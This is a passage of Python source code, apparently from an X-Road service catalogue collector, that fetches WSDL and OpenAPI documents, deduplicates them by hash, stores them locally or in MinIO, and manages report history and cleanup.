LOGGER.error('Invalid JSON configuration file "%s": %s', config_file, str(err))
return None
def configure_logging(config):
"""Configure logging based on loaded configuration"""
if 'logging-config' in config:
logging.config.dictConfig(config['logging-config'])
LOGGER.info('Logger configured')
def set_params(config):
"""Configure parameters based on loaded configuration"""
params = {
'path': None,
'minio': None,
'minio_access_key': None,
'minio_secret_key': None,
'minio_secure': True,
'minio_ca_certs': None,
'minio_bucket': 'catalogue',
'minio_path': '',
'url': None,
'client': None,
'instance': None,
'timeout': DEFAULT_TIMEOUT,
'verify': False,
'cert': None,
'thread_cnt': DEFAULT_THREAD_COUNT,
'wsdl_replaces': DEFAULT_WSDL_REPLACES,
'excluded_member_codes': [],
'excluded_subsystem_codes': [],
'filtered_hours': 24,
'filtered_days': 30,
'filtered_months': 12,
'cleanup_interval': 7,
'days_to_keep': 30,
'work_queue': queue.Queue(),
'results': {},
'results_lock': Lock(),
'shutdown': Event()
}
if 'output_path' in config:
params['path'] = config['output_path']
LOGGER.info('Configuring "path": %s', params['path'])
if 'minio_url' in config:
params['minio'] = config['minio_url']
LOGGER.info('Configuring "minio_url": %s', params['minio'])
if 'minio_access_key' in config:
params['minio_access_key'] = config['minio_access_key']
LOGGER.info('Configuring "minio_access_key": %s', params['minio_access_key'])
if 'minio_secret_key' in config:
params['minio_secret_key'] = config['minio_secret_key']
LOGGER.info('Configuring "minio_secret_key": <password hidden>')
if 'minio_secure' in config:
params['minio_secure'] = config['minio_secure']
LOGGER.info('Configuring "minio_secure": %s', params['minio_secure'])
if 'minio_ca_certs' in config:
params['minio_ca_certs'] = config['minio_ca_certs']
LOGGER.info('Configuring "minio_ca_certs": %s', params['minio_ca_certs'])
if 'minio_bucket' in config:
params['minio_bucket'] = config['minio_bucket']
LOGGER.info('Configuring "minio_bucket": %s', params['minio_bucket'])
if 'minio_path' in config:
params['minio_path'] = config['minio_path']
        params['minio_path'] = params['minio_path'].strip('/')
if params['minio_path']:
params['minio_path'] += '/'
LOGGER.info('Configuring "minio_path": %s', params['minio_path'])
if params['path'] is None and params['minio'] is None:
        LOGGER.error('Configuration error: Neither an output path nor a MinIO URL is provided')
return None
if 'server_url' in config:
params['url'] = config['server_url']
LOGGER.info('Configuring "url": %s', params['url'])
else:
LOGGER.error('Configuration error: Local Security Server URL is not provided')
return None
if 'client' in config and len(config['client']) in (3, 4):
params['client'] = config['client']
LOGGER.info('Configuring "client": %s', params['client'])
else:
        LOGGER.error(
            'Configuration error: Client identifier is incorrect. Expecting a list of identifiers. '
            'Example: ["INST", "CLASS", "MEMBER_CODE", "MEMBER_CLASS"]')
return None
if 'instance' in config and config['instance']:
params['instance'] = config['instance']
LOGGER.info('Configuring "instance": %s', params['instance'])
if 'timeout' in config and config['timeout'] > 0.0:
params['timeout'] = config['timeout']
LOGGER.info('Configuring "timeout": %s', params['timeout'])
if 'server_cert' in config and config['server_cert']:
params['verify'] = config['server_cert']
LOGGER.info('Configuring "verify": %s', params['verify'])
if 'client_cert' in config and 'client_key' in config \
and config['client_cert'] and config['client_key']:
params['cert'] = (config['client_cert'], config['client_key'])
LOGGER.info('Configuring "cert": %s', params['cert'])
if 'thread_count' in config and config['thread_count'] > 0:
params['thread_cnt'] = config['thread_count']
LOGGER.info('Configuring "thread_cnt": %s', params['thread_cnt'])
if 'wsdl_replaces' in config:
params['wsdl_replaces'] = config['wsdl_replaces']
LOGGER.info('Configuring "wsdl_replaces": %s', params['wsdl_replaces'])
if 'excluded_member_codes' in config:
params['excluded_member_codes'] = config['excluded_member_codes']
LOGGER.info('Configuring "excluded_member_codes": %s', params['excluded_member_codes'])
if 'excluded_subsystem_codes' in config:
params['excluded_subsystem_codes'] = config['excluded_subsystem_codes']
LOGGER.info(
'Configuring "excluded_subsystem_codes": %s', params['excluded_subsystem_codes'])
if 'filtered_hours' in config and config['filtered_hours'] > 0:
params['filtered_hours'] = config['filtered_hours']
LOGGER.info('Configuring "filtered_hours": %s', params['filtered_hours'])
if 'filtered_days' in config and config['filtered_days'] > 0:
params['filtered_days'] = config['filtered_days']
LOGGER.info('Configuring "filtered_days": %s', params['filtered_days'])
if 'filtered_months' in config and config['filtered_months'] > 0:
params['filtered_months'] = config['filtered_months']
LOGGER.info('Configuring "filtered_months": %s', params['filtered_months'])
if 'cleanup_interval' in config and config['cleanup_interval'] > 0:
params['cleanup_interval'] = config['cleanup_interval']
LOGGER.info('Configuring "cleanup_interval": %s', params['cleanup_interval'])
if 'days_to_keep' in config and config['days_to_keep'] > 0:
params['days_to_keep'] = config['days_to_keep']
LOGGER.info('Configuring "days_to_keep": %s', params['days_to_keep'])
if params['path'] is not None and params['minio'] is not None:
LOGGER.warning('Saving to both local and MinIO storage is not supported')
if params['minio']:
LOGGER.info('Using MinIO storage')
else:
LOGGER.info('Using local storage')
LOGGER.info('Configuration done')
return params
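# A minimal configuration sketch accepted by set_params(); the values below are
# placeholders, not a real deployment:
#
#     {
#         "output_path": "/var/lib/catalogue",
#         "server_url": "https://security-server.example.com",
#         "client": ["INSTANCE", "MEMBER_CLASS", "MEMBER_CODE", "SUBSYSTEM"],
#         "instance": "INSTANCE",
#         "timeout": 5.0,
#         "thread_count": 4
#     }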
def prepare_minio_client(params):
"""Creates minio client and stores that in params"""
if params['minio_ca_certs']:
http_client = urllib3.PoolManager(
ca_certs=params['minio_ca_certs']
)
params['minio_client'] = Minio(
params['minio'],
access_key=params['minio_access_key'],
secret_key=params['minio_secret_key'],
secure=params['minio_secure'],
http_client=http_client)
else:
params['minio_client'] = Minio(
params['minio'],
access_key=params['minio_access_key'],
secret_key=params['minio_secret_key'],
secure=params['minio_secure'])
def make_dirs(path):
"""Create directories if they do not exist"""
try:
os.makedirs(path)
except OSError:
pass
if not os.path.exists(path):
LOGGER.error('Cannot create directory "%s"', path)
return False
return True
def hash_wsdls(path, params):
"""Find hashes of all WSDL's in directory"""
hashes = {}
if params['minio']:
for obj in params['minio_client'].list_objects(
params['minio_bucket'], prefix=path, recursive=False):
file_name = obj.object_name[len(path):]
search_res = re.search('^(\\d+)\\.wsdl$', file_name)
if search_res:
wsdl_object = params['minio_client'].get_object(
params['minio_bucket'], '{}{}'.format(path, file_name))
hashes[file_name] = hashlib.md5(wsdl_object.data).hexdigest()
else:
for file_name in os.listdir(path):
search_res = re.search('^(\\d+)\\.wsdl$', file_name)
if search_res:
# Reading as bytes to avoid line ending conversion
with open('{}/{}'.format(path, file_name), 'rb') as wsdl_file:
wsdl = wsdl_file.read()
hashes[file_name] = hashlib.md5(wsdl).hexdigest()
return hashes
def get_wsdl_hashes(path, params):
"""Get WSDL hashes in a directory"""
if params['minio']:
try:
wsdl_hashes_file = params['minio_client'].get_object(
params['minio_bucket'], '{}_wsdl_hashes'.format(path))
hashes = json.loads(wsdl_hashes_file.data.decode('utf-8'))
except NoSuchKey:
hashes = hash_wsdls(path, params)
else:
try:
            with open('{}/_wsdl_hashes'.format(path), 'r') as json_file:
hashes = json.load(json_file)
except IOError:
hashes = hash_wsdls(path, params)
return hashes
def save_wsdl(path, hashes, wsdl, wsdl_replaces, params):
"""Save WSDL if it does not exist yet"""
    # Replace dynamically generated comments in the WSDL so that a new WSDL
    # file is not created just because a comment changed.
for wsdl_replace in wsdl_replaces:
wsdl = re.sub(wsdl_replace[0], wsdl_replace[1], wsdl)
wsdl_hash = hashlib.md5(wsdl.encode('utf-8')).hexdigest()
max_wsdl = -1
for file_name in hashes.keys():
if wsdl_hash == hashes[file_name]:
# Matching WSDL found
return file_name, hashes
search_res = re.search('^(\\d+)\\.wsdl$', file_name)
if search_res:
if int(search_res.group(1)) > max_wsdl:
max_wsdl = int(search_res.group(1))
# Creating new file
new_file = '{}.wsdl'.format(int(max_wsdl) + 1)
wsdl_binary = wsdl.encode('utf-8')
if params['minio']:
params['minio_client'].put_object(
params['minio_bucket'], '{}{}'.format(path, new_file),
BytesIO(wsdl_binary), len(wsdl_binary), content_type='text/xml')
else:
# Writing as bytes to avoid line ending conversion
with open('{}/{}'.format(path, new_file), 'wb') as wsdl_file:
wsdl_file.write(wsdl_binary)
hashes[new_file] = wsdl_hash
return new_file, hashes
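# Naming behaviour of save_wsdl() in brief (illustrative): if `hashes` already
# contains '0.wsdl' and '1.wsdl' and the incoming WSDL matches neither hash, the
# document is written as '2.wsdl'; if its hash matches an existing entry, that
# file name is returned and nothing new is written.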
def hash_openapis(path, params):
"""Find hashes of all OpenAPI documents in directory"""
hashes = {}
if params['minio']:
for obj in params['minio_client'].list_objects(
params['minio_bucket'], prefix=path, recursive=False):
file_name = obj.object_name[len(path):]
search_res = re.search('^.+_(\\d+)\\.(yaml|json)$', file_name)
if search_res:
openapi_object = params['minio_client'].get_object(
params['minio_bucket'], '{}{}'.format(path, file_name))
hashes[file_name] = hashlib.md5(openapi_object.data).hexdigest()
else:
for file_name in os.listdir(path):
search_res = re.search('^.+_(\\d+)\\.(yaml|json)$', file_name)
if search_res:
# Reading as bytes to avoid line ending conversion
with open('{}/{}'.format(path, file_name), 'rb') as openapi_file:
openapi = openapi_file.read()
hashes[file_name] = hashlib.md5(openapi).hexdigest()
return hashes
def get_openapi_hashes(path, params):
"""Get OpenAPI hashes in a directory"""
if params['minio']:
try:
openapi_hashes_file = params['minio_client'].get_object(
params['minio_bucket'], '{}_openapi_hashes'.format(path))
hashes = json.loads(openapi_hashes_file.data.decode('utf-8'))
except NoSuchKey:
hashes = hash_openapis(path, params)
else:
try:
            with open('{}/_openapi_hashes'.format(path), 'r') as json_file:
hashes = json.load(json_file)
except IOError:
hashes = hash_openapis(path, params)
return hashes
def save_openapi(path, hashes, openapi, service_name, doc_type, params):
"""Save OpenAPI if it does not exist yet"""
openapi_hash = hashlib.md5(openapi.encode('utf-8')).hexdigest()
max_openapi = -1
for file_name in hashes.keys():
search_res = re.search('^{}_(\\d+)\\.(yaml|json)$'.format(service_name), file_name)
if search_res:
if openapi_hash == hashes[file_name]:
# Matching OpenAPI found (both name pattern and hash)
return file_name, hashes
if int(search_res.group(1)) > max_openapi:
max_openapi = int(search_res.group(1))
# Creating new file
new_file = '{}_{}.{}'.format(service_name, int(max_openapi) + 1, doc_type)
openapi_binary = openapi.encode('utf-8')
content_type = 'text/yaml'
if doc_type == 'json':
content_type = 'application/json'
if params['minio']:
params['minio_client'].put_object(
params['minio_bucket'], '{}{}'.format(path, new_file),
BytesIO(openapi_binary), len(openapi_binary), content_type=content_type)
else:
# Writing as bytes to avoid line ending conversion
with open('{}/{}'.format(path, new_file), 'wb') as openapi_file:
            openapi_file.write(openapi_binary)
hashes[new_file] = openapi_hash
return new_file, hashes
def save_hashes(path, hashes, file_type, params):
"""Save hashes of WSDL/OpenAPI documents (to speedup MinIO)"""
if params['minio']:
hashes_binary = json.dumps(hashes, indent=2, ensure_ascii=False).encode()
params['minio_client'].put_object(
params['minio_bucket'], '{}_{}_hashes'.format(path, file_type),
BytesIO(hashes_binary), len(hashes_binary), content_type='text/plain')
else:
write_json('{}/_{}_hashes'.format(path, file_type), hashes, params)
def method_item(method, status, wsdl):
"""Function that sets the correct structure for method item"""
return {
'serviceCode': method[4],
'serviceVersion': method[5],
'methodStatus': status,
'wsdl': wsdl
}
def service_item(service, status, openapi, endpoints):
"""Function that sets the correct structure for service item
If status=='OK' and openapi is empty then:
* it is REST X-Road service that does not have a description;
* endpoints array is empty.
If status=='OK' and openapi is not empty then:
* it is OpenAPI X-Road service with description;
* at least one endpoint must be present in OpenAPI description.
In other cases status must not be 'OK' to indicate problem with
the service.
"""
return {
'serviceCode': service[4],
'status': status,
'openapi': openapi,
'endpoints': endpoints
}
def subsystem_item(subsystem, methods, services):
"""Function that sets the correct structure for subsystem item"""
subsystem_status = 'ERROR'
sorted_methods = []
if methods is not None:
subsystem_status = 'OK'
for method_key in sorted(methods.keys()):
sorted_methods.append(methods[method_key])
return {
'xRoadInstance': subsystem[0],
'memberClass': subsystem[1],
'memberCode': subsystem[2],
'subsystemCode': subsystem[3],
'subsystemStatus': subsystem_status,
'servicesStatus': 'OK' if services is not None else 'ERROR',
'methods': sorted_methods,
'services': services if services is not None else []
}
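# For orientation (hypothetical identifier values), a single entry produced by
# subsystem_item() and later written into an index_*.json report looks like:
#
#     {
#         "xRoadInstance": "TEST", "memberClass": "GOV", "memberCode": "1234",
#         "subsystemCode": "MYSUB", "subsystemStatus": "OK", "servicesStatus": "OK",
#         "methods": [...], "services": [...]
#     }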
def process_methods(subsystem, params, doc_path):
"""Function that finds SOAP methods of a subsystem"""
wsdl_path = '{}{}/'.format(params['minio_path'], doc_path)
if not params['minio']:
wsdl_path = '{}/{}'.format(params['path'], doc_path)
try:
if not params['minio']:
make_dirs(wsdl_path)
hashes = get_wsdl_hashes(wsdl_path, params)
except OSError as err:
LOGGER.warning('SOAP: %s: %s', identifier_path(subsystem), err)
return None
method_index = {}
skip_methods = False
try:
# Converting iterator to list to properly capture exceptions
methods = list(xrdinfo.methods(
addr=params['url'], client=params['client'], producer=subsystem,
method='listMethods', timeout=params['timeout'], verify=params['verify'],
cert=params['cert']))
except xrdinfo.XrdInfoError as err:
LOGGER.info('SOAP: %s: %s', identifier_path(subsystem), err)
return None
for method in sorted(methods):
method_name = identifier_path(method)
if method_name in method_index:
            # Method already found in previous WSDLs
continue
if skip_methods:
# Skipping, because previous getWsdl request timed out
LOGGER.info('SOAP: %s - SKIPPING', method_name)
method_index[method_name] = method_item(method, 'SKIPPED', '')
continue
try:
wsdl = xrdinfo.wsdl(
addr=params['url'], client=params['client'], service=method,
timeout=params['timeout'], verify=params['verify'], cert=params['cert'])
except xrdinfo.RequestTimeoutError:
# Skipping all following requests to that subsystem
skip_methods = True
LOGGER.info('SOAP: %s - TIMEOUT', method_name)
method_index[method_name] = method_item(method, 'TIMEOUT', '')
continue
except xrdinfo.XrdInfoError as err:
if str(err) == 'SoapFault: Service is a REST service and does not have a WSDL':
# This is specific to X-Road 6.21 (partial and
# deprecated support for REST). We do not want to spam
# INFO messages about REST services
LOGGER.debug('SOAP: %s: %s', method_name, err)
else:
LOGGER.info('SOAP: %s: %s', method_name, err)
method_index[method_name] = method_item(method, 'ERROR', '')
continue
try:
wsdl_name, hashes = save_wsdl(wsdl_path, hashes, wsdl, params['wsdl_replaces'], params)
except OSError as err:
LOGGER.warning('SOAP: %s: %s', method_name, err)
method_index[method_name] = method_item(method, 'ERROR', '')
continue
txt = 'SOAP: {}'.format(wsdl_name)
try:
for wsdl_method in xrdinfo.wsdl_methods(wsdl):
wsdl_method_name = identifier_path(subsystem + wsdl_method)
# We can find other methods in a method WSDL
method_index[wsdl_method_name] = method_item(
subsystem + wsdl_method, 'OK', urlparse.quote(
'{}/{}'.format(doc_path, wsdl_name)))
txt = txt + '\n {}'.format(wsdl_method_name)
except xrdinfo.XrdInfoError as err:
txt = txt + '\nWSDL parsing failed: {}'.format(err)
method_index[method_name] = method_item(method, 'ERROR', '')
LOGGER.info(txt)
if method_name not in method_index:
LOGGER.warning(
'SOAP: %s - Method was not found in returned WSDL!', method_name)
method_index[method_name] = method_item(method, 'ERROR', '')
save_hashes(wsdl_path, hashes, 'wsdl', params)
return method_index
def process_services(subsystem, params, doc_path):
"""Function that finds REST services of a subsystem"""
openapi_path = '{}{}/'.format(params['minio_path'], doc_path)
if not params['minio']:
openapi_path = '{}/{}'.format(params['path'], doc_path)
try:
if not params['minio']:
make_dirs(openapi_path)
hashes = get_openapi_hashes(openapi_path, params)
except OSError as err:
LOGGER.warning('REST: %s: %s', identifier_path(subsystem), err)
return None
results = []
skip_services = False
try:
# Converting iterator to list to properly capture exceptions
services = list(xrdinfo.methods_rest(
addr=params['url'], client=params['client'], producer=subsystem,
method='listMethods', timeout=params['timeout'], verify=params['verify'],
cert=params['cert']))
except xrdinfo.XrdInfoError as err:
LOGGER.info('REST: %s: %s', identifier_path(subsystem), err)
return None
for service in sorted(services):
service_name = identifier_path(service)
if skip_services:
# Skipping, because previous getOpenAPI request timed out
LOGGER.info('REST: %s - SKIPPING', service_name)
results.append(service_item(service, 'SKIPPED', '', []))
continue
try:
openapi = xrdinfo.openapi(
addr=params['url'], client=params['client'], service=service,
timeout=params['timeout'], verify=params['verify'], cert=params['cert'])
except xrdinfo.RequestTimeoutError:
# Skipping all following requests to that subsystem
skip_services = True
LOGGER.info('REST: %s - TIMEOUT', service_name)
results.append(service_item(service, 'TIMEOUT', '', []))
continue
except xrdinfo.NotOpenapiServiceError:
results.append(service_item(service, 'OK', '', []))
continue
except xrdinfo.XrdInfoError as err:
LOGGER.info('REST: %s: %s', service_name, err)
results.append(service_item(service, 'ERROR', '', []))
continue
try:
_, openapi_type = xrdinfo.load_openapi(openapi)
endpoints = xrdinfo.openapi_endpoints(openapi)
except xrdinfo.XrdInfoError as err:
LOGGER.info('REST: %s: %s', service_name, err)
results.append(service_item(service, 'ERROR', '', []))
continue
try:
openapi_name, hashes = save_openapi(
openapi_path, hashes, openapi, service[4], openapi_type, params)
except OSError as err:
LOGGER.warning('REST: %s: %s', service_name, err)
results.append(service_item(service, 'ERROR', '', []))
continue
results.append(
service_item(service, 'OK', urlparse.quote(
'{}/{}'.format(doc_path, openapi_name)), endpoints))
save_hashes(openapi_path, hashes, 'openapi', params)
return results
def worker(params):
"""Main function for worker threads"""
while True:
# Checking periodically if it is the time to gracefully shutdown
# the worker.
try:
subsystem = params['work_queue'].get(True, 0.1)
LOGGER.info('Start processing %s', identifier_path(subsystem))
except queue.Empty:
if params['shutdown'].is_set():
return
continue
subsystem_path = ''
try:
subsystem_path = identifier_path(subsystem)
methods_result = process_methods(subsystem, params, subsystem_path)
services_result = process_services(subsystem, params, subsystem_path)
with params['results_lock']:
params['results'][subsystem_path] = subsystem_item(
subsystem, methods_result, services_result)
# Using broad exception to avoid unexpected exits of workers
except Exception as err:
with params['results_lock']:
params['results'][subsystem_path] = subsystem_item(subsystem, None, None)
LOGGER.warning('Unexpected exception: %s: %s', type(err).__name__, err)
finally:
params['work_queue'].task_done()
def hour_start(src_time):
"""Return the beginning of the hour of the specified datetime"""
return datetime(src_time.year, src_time.month, src_time.day, src_time.hour)
def day_start(src_time):
"""Return the beginning of the day of the specified datetime"""
return datetime(src_time.year, src_time.month, src_time.day)
def month_start(src_time):
"""Return the beginning of the month of the specified datetime"""
return datetime(src_time.year, src_time.month, 1)
def year_start(src_time):
"""Return the beginning of the year of the specified datetime"""
return datetime(src_time.year, 1, 1)
def add_months(src_time, amount):
"""Adds specified amount of months to datetime value.
Specifying negative amount will result in subtraction of months.
"""
return src_time.replace(
# To find the year correction we convert the month from 1..12 to
# 0..11 value, add amount of months and find the integer
# part of division by 12.
year=src_time.year + (src_time.month - 1 + amount) // 12,
# To find the new month we convert the month from 1..12 to
# 0..11 value, add amount of months, find the remainder
# part after division by 12 and convert the month back
# to the 1..12 form.
month=(src_time.month - 1 + amount) % 12 + 1)
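# Worked example: add_months(datetime(2020, 11, 15), 3) gives datetime(2021, 2, 15),
# because (11 - 1 + 3) // 12 = 1 year is added and (11 - 1 + 3) % 12 + 1 = 2 becomes
# the new month. Note that replace() raises ValueError for days that do not exist in
# the target month (e.g. shifting January 31 by one month).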
def shift_current_hour(offset):
"""Shifts current hour by a specified offset"""
start = hour_start(datetime.today())
return start + timedelta(hours=offset)
def shift_current_day(offset):
"""Shifts current hour by a specified offset"""
start = day_start(datetime.today())
return start + timedelta(days=offset)
def shift_current_month(offset):
"""Shifts current hour by a specified offset"""
start = month_start(datetime.today())
return add_months(start, offset)
def add_filtered(filtered, item_key, report_time, history_item, min_time):
"""Add report to the list of filtered reports"""
if min_time is None or item_key >= min_time:
if item_key not in filtered or report_time < filtered[item_key]['time']:
filtered[item_key] = {'time': report_time, 'item': history_item}
def sort_by_report_time(item):
"""A helper function for sorting, indicates which field to use"""
return item['reportTime']
def all_results_failed(subsystems):
"""Check if all results have failed status"""
for subsystem in subsystems.values():
if subsystem['subsystemStatus'] == 'OK':
# Found non-failed subsystem
return False
# All results failed
return True
def write_json(file_name, json_data, params):
"""Write data to JSON file"""
if params['minio']:
json_binary = json.dumps(json_data, indent=2, ensure_ascii=False).encode()
params['minio_client'].put_object(
params['minio_bucket'], file_name,
BytesIO(json_binary), len(json_binary), content_type='application/json')
else:
with open(file_name, 'w') as json_file:
json.dump(json_data, json_file, indent=2, ensure_ascii=False)
def filtered_history(json_history, params):
"""Get filtered reports history"""
min_hour = shift_current_hour(-params['filtered_hours'])
min_day = shift_current_day(-params['filtered_days'])
min_month = shift_current_month(-params['filtered_months'])
filtered_items = {}
for history_item in json_history:
report_time = datetime.strptime(history_item['reportTime'], '%Y-%m-%d %H:%M:%S')
item_key = hour_start(report_time)
add_filtered(filtered_items, item_key, report_time, history_item, min_hour)
item_key = day_start(report_time)
add_filtered(filtered_items, item_key, report_time, history_item, min_day)
item_key = month_start(report_time)
add_filtered(filtered_items, item_key, report_time, history_item, min_month)
# Adding all available years
item_key = year_start(report_time)
add_filtered(filtered_items, item_key, report_time, history_item, None)
# Latest report is always added to filtered history
latest = json_history[0]
unique_items = {latest['reportTime']: latest}
for val in filtered_items.values():
item = val['item']
unique_items[item['reportTime']] = item
json_filtered_history = list(unique_items.values())
json_filtered_history.sort(key=sort_by_report_time, reverse=True)
return json_filtered_history
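# In other words, assuming e.g. filtered_hours=24, filtered_days=30 and
# filtered_months=12 in the configuration, the filtered history keeps the earliest
# report of each hour for the last 24 hours, of each day for the last 30 days,
# of each month for the last 12 months, of every year, plus always the latest report.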
def add_report_file(file_name, reports, history=False):
"""Add report to reports list if filename matches"""
search_res = re.search(
'^index_(\\d{4})(\\d{2})(\\d{2})(\\d{2})(\\d{2})(\\d{2})\\.json$', file_name)
if search_res and history:
reports.append({
'reportTime': '{}-{}-{} {}:{}:{}'.format(
search_res.group(1), search_res.group(2),
search_res.group(3), search_res.group(4),
search_res.group(5), search_res.group(6)),
'reportPath': file_name})
elif search_res:
reports.append({
'reportTime': datetime(
int(search_res.group(1)), int(search_res.group(2)),
int(search_res.group(3)), int(search_res.group(4)),
int(search_res.group(5)), int(search_res.group(6))),
'reportPath': file_name})
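# Example (hypothetical report): the file name "index_20240131123045.json" is parsed
# into reportTime "2024-01-31 12:30:45" (or the equivalent datetime object when
# history=False), with the file name itself stored as reportPath.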
def get_catalogue_reports(params, history=False):
"""Get list of reports"""
reports = []
if params['minio']:
for obj in params['minio_client'].list_objects(
params['minio_bucket'], prefix=params['minio_path'], recursive=False):
file_name = obj.object_name[len(params['minio_path']):]
add_report_file(file_name, reports, history=history)
else:
for file_name in os.listdir(params['path']):
add_report_file(file_name, reports, history=history)
reports.sort(key=sort_by_report_time, reverse=True)
return reports
def get_reports_to_keep(reports, fresh_time):
"""Get reports that must not be removed during cleanup"""
# Latest report is never deleted
unique_paths = {reports[0]['reportTime']: reports[0]['reportPath']}
filtered_items = {}
for report in reports:
if report['reportTime'] >= fresh_time:
# Keeping all fresh reports
unique_paths[report['reportTime']] = report['reportPath']
else:
# Searching for the first report in a day
item_key = datetime(
report['reportTime'].year, report['reportTime'].month, report['reportTime'].day)
if item_key not in filtered_items \
or report['reportTime'] < filtered_items[item_key]['reportTime']:
filtered_items[item_key] = {
'reportTime': report['reportTime'], 'reportPath': report['reportPath']}
# Adding first report of the day
for item in filtered_items.values():
unique_paths[item['reportTime']] = item['reportPath']
paths_to_keep = list(unique_paths.values())
paths_to_keep.sort()
return paths_to_keep
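# The retention policy implemented above therefore keeps: the newest report, every
# report whose timestamp is at least fresh_time, and for each older day only that
# day's first (earliest) report; everything else becomes eligible for removal.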
def get_old_reports(params):
"""Get old reports that need to be removed"""
old_reports = []
all_reports = get_catalogue_reports(params)
cur_time = datetime.today()
fresh_time = datetime(cur_time.year, cur_time.month, cur_time.day) - timedelta(
days=params['days_to_keep'])
paths_to_keep = get_reports_to_keep(all_reports, fresh_time)
for report in all_reports:
if not report['reportPath'] in paths_to_keep:
old_reports.append(report['reportPath'])
old_reports.sort()
return old_reports
def get_reports_set(params):
"""Get set of reports"""
reports = set()
if params['minio']:
for obj in params['minio_client'].list_objects(
params['minio_bucket'], prefix=params['minio_path'], recursive=False):
file_name = obj.object_name[len(params['minio_path']):]
search_res = re.search(
'^index_(\\d{4})(\\d{2})(\\d{2})(\\d{2})(\\d{2})(\\d{2})\\.json$',
file_name)
if search_res:
reports.add(file_name)
else:
for file_name in os.listdir(params['path']):
search_res = re.search(
'^index_(\\d{4})(\\d{2})(\\d{2})(\\d{2})(\\d{2})(\\d{2})\\.json$',
file_name)
if search_res:
reports.add(file_name)
return reports
def get_docs_in_report(params, report_file):
    """Get the set of WSDL and OpenAPI document paths referenced in a report"""
if params['minio']:
obj = params['minio_client'].get_object(
params['minio_bucket'], '{}{}'.format(params['minio_path'], report_file))
report_data = json.loads(obj.data.decode('utf-8'))
else:
with open('{}/{}'.format(params['path'], report_file), 'r') as json_file:
report_data = json.load(json_file)
used_docs = set()
for system in report_data:
for method in system['methods']:
if method['wsdl']:
if params['minio']:
used_docs.add('{}{}'.format(params['minio_path'], method['wsdl']))
else:
used_docs.add('{}/{}'.format(params['path'], method['wsdl']))
if 'services' in system:
for service in system['services']:
if service['openapi']:
if params['minio']:
used_docs.add('{}{}'.format(params['minio_path'], service['openapi']))
else:
used_docs.add('{}/{}'.format(params['path'], service['openapi']))
return used_docs
def add_doc_file(file_name, path, docs):
    """Add a file to the docs set if its name matches the WSDL or OpenAPI pattern"""
search_res = re.search('^\\d+\\.wsdl$', file_name)
if search_res:
docs.add(os.path.join(path, file_name))
search_res = re.search('^.+_(\\d+)\\.(yaml|json)$', file_name)
if search_res:
docs.add(os.path.join(path, file_name))
def get_available_docs(params):
    """Get the set of all WSDL and OpenAPI documents available in storage"""
available_docs = set()
if params['minio']:
for obj in params['minio_client'].list_objects(
params['minio_bucket'],
prefix=os.path.join(params['minio_path'], params['instance']),
recursive=True):
add_doc_file(
os.path.basename(obj.object_name), os.path.dirname(obj.object_name), available_docs)
else:
for root, _, files in os.walk(os.path.join(params['path'], params['instance'])):
for file_name in files:
add_doc_file(file_name, root, available_docs)
return available_docs
def get_unused_docs(params):
    """Get documents that are not referenced by any report"""
reports = get_reports_set(params)
if not reports:
LOGGER.warning('Did not find any reports!')
return set()
used_docs = set()
for report_file in reports:
used_docs = used_docs.union(get_docs_in_report(params, report_file))
if not used_docs:
        LOGGER.info('Did not find any documents in reports. This might be an error.')
return set()
available_docs = get_available_docs(params)
return available_docs - used_docs
def start_cleanup(params):
"""Start cleanup of old reports and documents"""
last_cleanup = None
if params['minio']:
try:
json_file = params['minio_client'].get_object(
params['minio_bucket'], '{}cleanup_status.json'.format(params['minio_path']))
cleanup_status = json.loads(json_file.data.decode('utf-8'))
last_cleanup = datetime.strptime(cleanup_status['lastCleanup'], '%Y-%m-%d %H:%M:%S')
except (NoSuchKey, ValueError):
LOGGER.info('Cleanup status not found')
else:
try:
with open('{}/cleanup_status.json'.format(params['path']), 'r') as json_file:
cleanup_status = json.load(json_file)
last_cleanup = datetime.strptime(cleanup_status['lastCleanup'], '%Y-%m-%d %H:%M:%S')
except (IOError, ValueError):
LOGGER.info('Cleanup status not found')
if last_cleanup:
if datetime.today() - timedelta(days=params['cleanup_interval']) < day_start(last_cleanup):
LOGGER.info('Cleanup interval is not passed yet')
return
LOGGER.info('Starting cleanup')
# Cleanup reports
old_reports = get_old_reports(params)
if len(old_reports):
LOGGER.info('Removing %s old JSON reports:', len(old_reports))
for report_path in old_reports:
if params['minio']:
LOGGER.info('Removing %s%s', params['minio_path'], report_path)
params['minio_client'].remove_object(
params['minio_bucket'], '{}{}'.format(params['minio_path'], report_path))
else:
LOGGER.info('Removing %s/%s', params['path'], report_path)
os.remove('{}/{}'.format(params['path'], report_path))
# Recreating history.json
reports = get_catalogue_reports(params, history=True)
if len(reports):
LOGGER.info('Writing %s reports to history.json', len(reports))
if params['minio']:
write_json('{}history.json'.format(params['minio_path']), reports, params)
else:
write_json('{}/history.json'.format(params['path']), reports, params)
else:
LOGGER.info('No old JSON reports found in directory: %s', params['path'])
# Cleanup documents
unused_docs = get_unused_docs(params)
changed_dirs = set()
if unused_docs:
        LOGGER.info('Removing %s unused document(s):', len(unused_docs))
for doc_path in unused_docs:
LOGGER.info('Removing %s', doc_path)
if params['minio']:
params['minio_client'].remove_object(params['minio_bucket'], doc_path)
else:
os.remove(doc_path)
changed_dirs.add(os.path.dirname(doc_path))
else:
LOGGER.info('No unused documents found')
# Recreating document hashes cache
for doc_path in changed_dirs:
LOGGER.info('Recreating WSDL hashes cache for %s', doc_path)
hashes = get_wsdl_hashes(doc_path, params)
save_hashes(doc_path, hashes, 'wsdl', params)
LOGGER.info('Recreating OpenAPI hashes cache for %s', doc_path)
hashes = get_openapi_hashes(doc_path, params)
save_hashes(doc_path, hashes, 'openapi', params)
# Updating status
cleanup_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
json_status = {'lastCleanup': cleanup_time}
if params['minio']:
write_json('{}cleanup_status.json'.format(params['minio_path']), json_status, params)
else:
write_json('{}/cleanup_status.json'.format(params['path']), json_status, params)
def process_results(params):
"""Process results collected by worker threads"""
results = params['results']
if all_results_failed(results):
# Skipping this version
LOGGER.error('All subsystems failed, skipping this catalogue version!')
sys.exit(1)
json_data = []
for subsystem_key in sorted(results.keys()):
json_data.append(results[subsystem_key])
report_time = time.localtime(time.time())
formatted_time = time.strftime('%Y-%m-%d %H:%M:%S', report_time)
suffix = time.strftime('%Y%m%d%H%M%S', report_time)
if params['minio']:
write_json('{}index_{}.json'.format(params['minio_path'], suffix), json_data, params)
else:
write_json('{}/index_{}.json'.format(params['path'], suffix), json_data, params)
json_history = []
if params['minio']:
try:
json_history_file = params['minio_client'].get_object(
params['minio_bucket'], '{}history.json'.format(params['minio_path']))
